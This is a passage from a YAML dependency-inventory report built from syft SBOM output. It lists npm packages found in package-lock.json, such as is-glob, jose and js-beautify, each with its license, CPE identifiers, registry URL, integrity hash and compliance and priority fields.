tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: is-binary-path 2.1.0'
title: is-binary-path 2.1.0
description: 'Package discovered: is-binary-path 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 12d3bfff6ef69b2c
name: is-binary-path
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:is-binary-path:is-binary-path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-binary-path:is_binary_path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_binary_path:is-binary-path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_binary_path:is_binary_path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-binary:is-binary-path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-binary:is_binary_path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_binary:is-binary-path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_binary:is_binary_path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is-binary-path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is_binary_path:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/is-binary-path@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz
integrity: sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==
dependencies:
binary-extensions: ^2.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3e8a78c5009c1819
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: is-core-module 2.16.1'
title: is-core-module 2.16.1
description: 'Package discovered: is-core-module 2.16.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9f592f96ab7392ec
name: is-core-module
version: 2.16.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:is-core-module:is-core-module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-core-module:is_core_module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_core_module:is-core-module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_core_module:is_core_module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-core:is-core-module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-core:is_core_module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_core:is-core-module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_core:is_core_module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is-core-module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is_core_module:2.16.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/is-core-module@2.16.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/is-core-module/-/is-core-module-2.16.1.tgz
integrity: sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w==
dependencies:
hasown: ^2.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: bb2d7c3406b84981
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: is-extglob 2.1.1'
title: is-extglob 2.1.1
description: 'Package discovered: is-extglob 2.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b2879743f62f2c47
name: is-extglob
version: 2.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:is-extglob:is-extglob:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-extglob:is_extglob:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_extglob:is-extglob:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_extglob:is_extglob:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is-extglob:2.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is_extglob:2.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/is-extglob@2.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz
integrity: sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 437e0c6e090c00f1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: is-fullwidth-code-point 3.0.0'
title: is-fullwidth-code-point 3.0.0
description: 'Package discovered: is-fullwidth-code-point 3.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8a7d27e13373f9f8
name: is-fullwidth-code-point
version: 3.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:is-fullwidth-code-point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-fullwidth-code-point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_fullwidth_code_point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_fullwidth_code_point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-fullwidth-code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-fullwidth-code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_fullwidth_code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_fullwidth_code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/is-fullwidth-code-point@3.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz
integrity: sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8b982d6ae21c367b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: is-glob 4.0.3'
title: is-glob 4.0.3
description: 'Package discovered: is-glob 4.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6a2e0a343ed2b45b
name: is-glob
version: 4.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:is-glob:is-glob:4.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-glob:is_glob:4.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_glob:is-glob:4.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_glob:is_glob:4.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is-glob:4.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is_glob:4.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/is-glob@4.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz
integrity: sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==
dependencies:
is-extglob: ^2.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f5c20bc28d065782
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: is-number 7.0.0'
title: is-number 7.0.0
description: 'Package discovered: is-number 7.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 19d61645d0264090
name: is-number
version: 7.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:is-number:is-number:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-number:is_number:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_number:is-number:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_number:is_number:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is-number:7.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is_number:7.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/is-number@7.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz
integrity: sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1ec1886de995b530
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: is-stream 2.0.1'
title: is-stream 2.0.1
description: 'Package discovered: is-stream 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0d47a7f43264d12f
name: is-stream
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:is-stream:is-stream:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-stream:is_stream:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_stream:is-stream:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_stream:is_stream:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is-stream:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is_stream:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/is-stream@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz
integrity: sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: cd8dbd159ce77812
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: is-url 1.2.4'
title: is-url 1.2.4
description: 'Package discovered: is-url 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0055323086e6dbe0
name: is-url
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:is-url:is-url:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-url:is_url:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_url:is-url:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_url:is_url:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is-url:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is_url:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/is-url@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/is-url/-/is-url-1.2.4.tgz
integrity: sha512-ITvGim8FhRiYe4IQ5uHSkj7pVaPDrCTkNd3yq3cV7iZAcJdHTUMPMEHcqSOy9xZ9qFenQCvi+2wjH9a1nXqHww==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 25f78dcaa669e646
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: isarray 1.0.0'
title: isarray 1.0.0
description: 'Package discovered: isarray 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 14ac0fadd6b69d11
name: isarray
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:isarray:isarray:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/isarray@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz
integrity: sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b4f550816fd1d6a8
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: isexe 2.0.0'
title: isexe 2.0.0
description: 'Package discovered: isexe 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 18556628c2ed871d
name: isexe
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:isexe:isexe:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/isexe@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz
integrity: sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 399923db78bd2f5d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: jackspeak 3.4.3'
title: jackspeak 3.4.3
description: 'Package discovered: jackspeak 3.4.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 668b76a592331d7f
name: jackspeak
version: 3.4.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BlueOak-1.0.0
spdxExpression: BlueOak-1.0.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jackspeak:jackspeak:3.4.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/jackspeak@3.4.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz
integrity: sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==
dependencies:
'@isaacs/cliui': ^8.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c7be600d2bcad0a1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: jay-peg 1.1.1'
title: jay-peg 1.1.1
description: 'Package discovered: jay-peg 1.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c5304af01a3223ed
name: jay-peg
version: 1.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jay-peg:jay-peg:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jay-peg:jay_peg:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jay_peg:jay-peg:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jay_peg:jay_peg:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jay:jay-peg:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jay:jay_peg:1.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/jay-peg@1.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/jay-peg/-/jay-peg-1.1.1.tgz
integrity: sha512-D62KEuBxz/ip2gQKOEhk/mx14o7eiFRaU+VNNSP4MOiIkwb/D6B3G1Mfas7C/Fit8EsSV2/IWjZElx/Gs6A4ww==
dependencies:
restructure: ^3.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5b403253da2d4e5e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: jiti 1.21.7'
title: jiti 1.21.7
description: 'Package discovered: jiti 1.21.7'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a3b57ee8874ce4dc
name: jiti
version: 1.21.7
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jiti:jiti:1.21.7:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/jiti@1.21.7
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/jiti/-/jiti-1.21.7.tgz
integrity: sha512-/imKNG4EbWNrVjoNC/1H5/9GFy+tqjGBHCaSsN+P2RnPqjsLmv6UD3Ej+Kj8nBWaRAwyk7kK5ZUc+OEatnTR3A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: feda20014c18c42e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: jose 4.15.9'
title: jose 4.15.9
description: 'Package discovered: jose 4.15.9'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0246497cf4065c27
name: jose
version: 4.15.9
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jose_project:jose:4.15.9:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/jose@4.15.9
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/jose/-/jose-4.15.9.tgz
integrity: sha512-1vUQX+IdDMVPj4k8kOxgUqlcK518yluMuGZwqlr44FS1ppZB/5GWh4rZG89erpOBOJjU/OBsnCVFfapsRz6nEA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ad953d39f31a884d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: js-beautify 1.15.4'
title: js-beautify 1.15.4
description: 'Package discovered: js-beautify 1.15.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: eb8b761fb0d3a989
name: js-beautify
version: 1.15.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:js-beautify:js-beautify:1.15.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js-beautify:js_beautify:1.15.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js_beautify:js-beautify:1.15.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js_beautify:js_beautify:1.15.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js:js-beautify:1.15.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js:js_beautify:1.15.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/js-beautify@1.15.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/js-beautify/-/js-beautify-1.15.4.tgz
integrity: sha512-9/KXeZUKKJwqCXUdBxFJ3vPh467OCckSBmYDwSK/EtV090K+iMJ7zx2S3HLVDIWFQdqMIsZWbnaGiba18aWhaA==
dependencies:
config-chain: ^1.1.13
editorconfig: ^1.0.4
glob: ^10.4.2
